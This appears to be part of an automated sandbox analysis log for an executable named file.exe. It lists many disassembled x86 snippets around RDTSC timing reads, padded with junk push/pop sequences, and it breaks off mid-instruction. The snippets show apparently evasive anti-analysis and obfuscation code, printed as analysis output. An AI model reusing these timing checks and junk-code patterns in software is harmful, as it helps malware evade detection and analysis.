Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A9833 second address: 421C32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F789C73D5B4h 0x00000010 pop eax 0x00000011 mov dword ptr [ebp+122D216Fh], edx 0x00000017 push dword ptr [ebp+122D0825h] 0x0000001d sub edi, dword ptr [ebp+122D3B0Dh] 0x00000023 call dword ptr [ebp+122D2509h] 0x00000029 pushad 0x0000002a pushad 0x0000002b mov edi, dword ptr [ebp+122D3B49h] 0x00000031 popad 0x00000032 xor eax, eax 0x00000034 mov dword ptr [ebp+122D1953h], edi 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e jmp 00007F789C73D5B5h 0x00000043 mov dword ptr [ebp+122D3A41h], eax 0x00000049 xor dword ptr [ebp+122D1953h], ecx 0x0000004f sub dword ptr [ebp+122D23D4h], edi 0x00000055 mov esi, 0000003Ch 0x0000005a jmp 00007F789C73D5B2h 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 je 00007F789C73D5B2h 0x00000069 jbe 00007F789C73D5ACh 0x0000006f mov dword ptr [ebp+122D1953h], ebx 0x00000075 lodsw 0x00000077 clc 0x00000078 add eax, dword ptr [esp+24h] 0x0000007c pushad 0x0000007d mov bh, 82h 0x0000007f jbe 00007F789C73D5A6h 0x00000085 popad 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a cld 0x0000008b nop 0x0000008c push ecx 0x0000008d push eax 0x0000008e push edx 0x0000008f jns 00007F789C73D5A6h 0x00000095 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A9877 second address: 5A987B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A9950 second address: 5A9955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A9B31 second address: 5A9B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A9B6B second address: 5A9BC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jne 00007F789C73D5ABh 0x00000010 mov edx, 161A1E5Eh 0x00000015 push 00000000h 0x00000017 movsx edi, bx 0x0000001a call 00007F789C73D5A9h 0x0000001f push ebx 0x00000020 push ebx 0x00000021 jmp 00007F789C73D5B9h 0x00000026 pop ebx 0x00000027 pop ebx 0x00000028 push eax 0x00000029 push ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d pop eax 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A9BC5 second address: 5A9C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c jmp 00007F789CC6148Fh 0x00000011 pop edi 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 jmp 00007F789CC61491h 0x0000001a ja 00007F789CC6149Dh 0x00000020 jmp 00007F789CC61497h 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d jmp 00007F789CC61497h 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A9C34 second address: 5A9CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b movsx edi, cx 0x0000000e push 00000003h 0x00000010 mov dword ptr [ebp+122D21AEh], ecx 0x00000016 push 00000000h 0x00000018 mov edi, eax 0x0000001a push 00000003h 0x0000001c jmp 00007F789C73D5B4h 0x00000021 push 7BCFA40Ch 0x00000026 push ebx 0x00000027 jnc 00007F789C73D5ACh 0x0000002d pop ebx 0x0000002e add dword ptr [esp], 44305BF4h 0x00000035 pushad 0x00000036 add dword ptr [ebp+122D183Bh], edx 0x0000003c call 00007F789C73D5B1h 0x00000041 and bh, 00000005h 0x00000044 pop eax 0x00000045 popad 0x00000046 lea ebx, dword ptr [ebp+1245B712h] 0x0000004c push 00000000h 0x0000004e push esi 0x0000004f call 00007F789C73D5A8h 0x00000054 pop esi 0x00000055 mov dword ptr [esp+04h], esi 0x00000059 add dword ptr [esp+04h], 0000001Ch 0x00000061 inc esi 0x00000062 push esi 0x00000063 ret 0x00000064 pop esi 0x00000065 ret 0x00000066 xchg eax, ebx 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b pop eax 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BBB14 second address: 5BBB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C9513 second address: 5C9518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5909D0 second address: 5909DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F789CC61492h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5909DD second address: 5909E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C80AB second address: 5C80BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F789CC61486h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C80BA second address: 5C80C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C80C0 second address: 5C80D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F789CC6148Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C80D4 second address: 5C80E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 je 00007F789C73D5AEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8217 second address: 5C821D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8385 second address: 5C839A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007F789C73D5A6h 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C839A second address: 5C83AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F789CC61486h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jg 00007F789CC61486h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C84C5 second address: 5C84C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C84C9 second address: 5C84CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BD463 second address: 5BD469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8BEA second address: 5C8C01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789CC61493h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8C01 second address: 5C8C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8C05 second address: 5C8C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F789CC61488h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jne 00007F789CC61486h 0x00000018 jno 00007F789CC61486h 0x0000001e jmp 00007F789CC6148Dh 0x00000023 popad 0x00000024 pushad 0x00000025 jmp 00007F789CC61493h 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 pop eax 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8DC9 second address: 5C8DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5B6h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F789C73D5ACh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8F2F second address: 5C8F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC61491h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8F44 second address: 5C8F48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C935E second address: 5C9364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C9364 second address: 5C9369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C9369 second address: 5C9370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C9370 second address: 5C937D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CBF97 second address: 5CBF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC510 second address: 5CC514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC5EB second address: 5CC605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F789CC61492h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC605 second address: 5CC64C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnc 00007F789C73D5B0h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F789C73D5B1h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC64C second address: 5CC650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC7D4 second address: 5CC7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789C73D5B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC7E8 second address: 5CC7EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CEE23 second address: 5CEE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F789C73D5AEh 0x0000000a jg 00007F789C73D5A6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59E273 second address: 59E277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59E277 second address: 59E295 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F789C73D5A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007F789C73D5A6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F789C73D5A6h 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59E295 second address: 59E2B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F789CC61496h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59E2B5 second address: 59E2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 599088 second address: 59908E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D77C3 second address: 5D77C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D77C7 second address: 5D77D1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F789CC61486h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D77D1 second address: 5D77E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F789C73D5A8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D795B second address: 5D7972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jnc 00007F789CC61486h 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D7972 second address: 5D7976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D7D77 second address: 5D7D7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D7D7B second address: 5D7D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D7ED4 second address: 5D7ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D7ED9 second address: 5D7F0E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F789C73D5BAh 0x00000008 jmp 00007F789C73D5B4h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F789C73D5B7h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D8702 second address: 5D8706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D87F2 second address: 5D8802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007F789C73D5A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D8DC7 second address: 5D8DD9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F789CC6148Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D8DD9 second address: 5D8DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D8FCE second address: 5D8FD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9445 second address: 5D9480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F789C73D5A8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D191Bh], esi 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c jp 00007F789C73D5A6h 0x00000032 jns 00007F789C73D5A6h 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9480 second address: 5D948E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789CC6148Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D948E second address: 5D9492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9731 second address: 5D9735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D98FD second address: 5D9925 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F789C73D5A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, ebx 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F789C73D5B2h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9925 second address: 5D9943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC6148Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jg 00007F789CC61486h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9943 second address: 5D9955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789C73D5AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9D40 second address: 5D9D58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61494h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DA768 second address: 5DA7DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F789C73D5A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push edi 0x00000012 mov dword ptr [ebp+122D1B66h], ecx 0x00000018 pop esi 0x00000019 push 00000000h 0x0000001b movzx esi, di 0x0000001e mov esi, dword ptr [ebp+122D2270h] 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F789C73D5A8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 xchg eax, ebx 0x00000041 jng 00007F789C73D5B4h 0x00000047 pushad 0x00000048 jnl 00007F789C73D5A6h 0x0000004e jl 00007F789C73D5A6h 0x00000054 popad 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 jmp 00007F789C73D5B0h 0x0000005e push eax 0x0000005f pop eax 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DCBA3 second address: 5DCBA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DCBA7 second address: 5DCBAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DED6D second address: 5DED72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DD4BE second address: 5DD4DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F789C73D5ACh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF596 second address: 5DF59C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DD4DE second address: 5DD4E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E2A87 second address: 5E2A8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF59C second address: 5DF5B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789C73D5B1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF5B1 second address: 5DF5B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E2F9F second address: 5E2FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E2FA3 second address: 5E2FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F789CC6148Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5152 second address: 5E5162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F789C73D5A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E60CD second address: 5E60D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E6F4E second address: 5E6F9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F789C73D5ACh 0x0000000c popad 0x0000000d nop 0x0000000e or dword ptr [ebp+124899D4h], ebx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F789C73D5A8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov edi, 3C5A43DAh 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d jbe 00007F789C73D5A6h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E6F9C second address: 5E6FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E60D3 second address: 5E6169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F789C73D5A8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D1E1Fh], esi 0x00000029 mov edi, dword ptr [ebp+122D298Ch] 0x0000002f push dword ptr fs:[00000000h] 0x00000036 or ebx, dword ptr [ebp+12468F24h] 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov di, 82D3h 0x00000047 mov eax, dword ptr [ebp+122D0535h] 0x0000004d mov edi, ecx 0x0000004f push FFFFFFFFh 0x00000051 mov dword ptr 